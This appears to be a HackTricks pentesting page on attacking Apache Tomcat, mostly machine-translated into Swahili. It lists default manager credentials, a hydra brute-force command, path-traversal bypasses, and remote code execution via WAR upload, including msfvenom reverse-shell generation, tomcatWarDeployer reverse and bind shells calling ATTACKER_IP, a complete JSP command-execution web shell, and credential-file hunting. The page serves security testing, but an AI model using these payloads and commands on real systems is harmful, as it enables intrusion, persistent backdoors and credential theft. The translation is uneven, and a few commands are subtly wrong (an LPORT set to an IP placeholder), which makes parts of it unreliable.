| .. | ||
| basic-tomcat-info.md | ||
| README.md | ||
Tomcat
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Discovery
- Inatumika kawaida kwenye bandari 8080
- Kosa la kawaida la Tomcat:
Enumeration
Version Identification
Ili kupata toleo la Apache Tomcat, amri rahisi inaweza kutekelezwa:
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
Hii itatafuta neno "Tomcat" katika ukurasa wa index wa hati, ikifunua toleo katika lebo ya kichwa ya jibu la HTML.
Mahali pa Faili za Meneja
Kutambua maeneo halisi ya /manager na /host-manager ni muhimu kwani majina yao yanaweza kubadilishwa. Tafutio la nguvu ni pendekezo ili kupata kurasa hizi.
Uhesabuji wa Majina ya Watumiaji
Kwa toleo za Tomcat zilizopita ya 6, inawezekana kuhesabu majina ya watumiaji kupitia:
msf> use auxiliary/scanner/http/tomcat_enum
Default Credentials
Direktori /manager/html ni nyeti sana kwani inaruhusu kupakia na kutekeleza faili za WAR, ambazo zinaweza kusababisha utekelezaji wa msimbo. Direktori hii inalindwa na uthibitishaji wa msingi wa HTTP, ambapo akidi za kawaida ni:
- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
Akidi hizi zinaweza kupimwa kwa kutumia:
msf> use auxiliary/scanner/http/tomcat_mgr_login
Maktaba nyingine muhimu ni /manager/status, ambayo inaonyesha toleo la Tomcat na OS, kusaidia katika utambuzi wa udhaifu.
Shambulio la Nguvu Kuu
Ili kujaribu shambulio la nguvu kuu kwenye saraka ya meneja, mtu anaweza kutumia:
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
Along with setting various parameters in Metasploit to target a specific host.
Common Vulnerabilities
Password Backtrace Disclosure
Kufikia /auth.jsp kunaweza kufichua nenosiri katika backtrace chini ya hali nzuri.
Double URL Encoding
Uthibitisho wa CVE-2007-1860 katika mod_jk unaruhusu upitaji wa njia wa double URL encoding, ukiruhusu ufikiaji usioidhinishwa wa kiolesura cha usimamizi kupitia URL iliyoundwa kwa njia maalum.
Ili kufikia wavuti ya usimamizi ya Tomcat nenda: pathTomcat/%252E%252E/manager/html
/examples
Apache Tomcat toleo 4.x hadi 7.x linajumuisha skripti za mfano ambazo zinaweza kuathiriwa na ufichuzi wa taarifa na mashambulizi ya cross-site scripting (XSS). Skripti hizi, zilizoorodheshwa kwa kina, zinapaswa kuangaliwa kwa ufikiaji usioidhinishwa na uwezekano wa kutumiwa vibaya. Pata maelezo zaidi hapa
- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp
Path Traversal Exploit
Katika baadhi ya mipangilio yenye hatari ya Tomcat unaweza kupata ufikiaji wa saraka zilizo na ulinzi katika Tomcat ukitumia njia: /..;/
Hivyo, kwa mfano, unaweza kuwa na uwezo wa kufikia ukurasa wa usimamizi wa Tomcat kwa kufikia: www.vulnerable.com/lalala/..;/manager/html
Njia nyingine ya kupita njia zilizolindwa kwa kutumia hila hii ni kufikia http://www.vulnerable.com/;param=value/manager/html
RCE
Hatimaye, ikiwa una ufikiaji wa Tomcat Web Application Manager, unaweza kupakia na kupeleka faili ya .war (kufanya kazi).
Limitations
Utakuwa na uwezo wa kupeleka WAR tu ikiwa una mamlaka ya kutosha (majukumu: admin, manager na manager-script). Maelezo hayo yanaweza kupatikana chini ya tomcat-users.xml ambayo kawaida huwekwa katika /usr/share/tomcat9/etc/tomcat-users.xml (inategemea toleo) (angalia POST section).
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
Metasploit
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
MSFVenom Reverse Shell
- Tengeneza war ili kupeleka:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
- Pakia faili la
revshell.warna upate ufikiaji kwake (/revshell/):
Bind na reverse shell na tomcatWarDeployer.py
Katika hali zingine hii haifanyi kazi (kwa mfano toleo za zamani za sun)
Pakua
git clone https://github.com/mgeeky/tomcatWarDeployer.git
Reverse shell
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
Bind shell
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
Kutumia Culsterd
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
Manual method - Web shell
Create index.jsp with this content:
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
You could also install this (allows upload, download and command execution): http://vonloesch.de/filebrowser.html
Manual Method 2
Pata JSP web shell kama hii na uunde faili la WAR:
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
POST
Jina la faili la akreditif za Tomcat ni tomcat-users.xml
find / -name tomcat-users.xml 2>/dev/null
Njia nyingine za kukusanya akreditifiki za Tomcat:
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
Zana nyingine za skanning tomcat
Marejeleo
- https://github.com/simran-sankhala/Pentest-Tomcat
- https://hackertarget.com/sample/nexpose-metasploitable-test.pdf
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.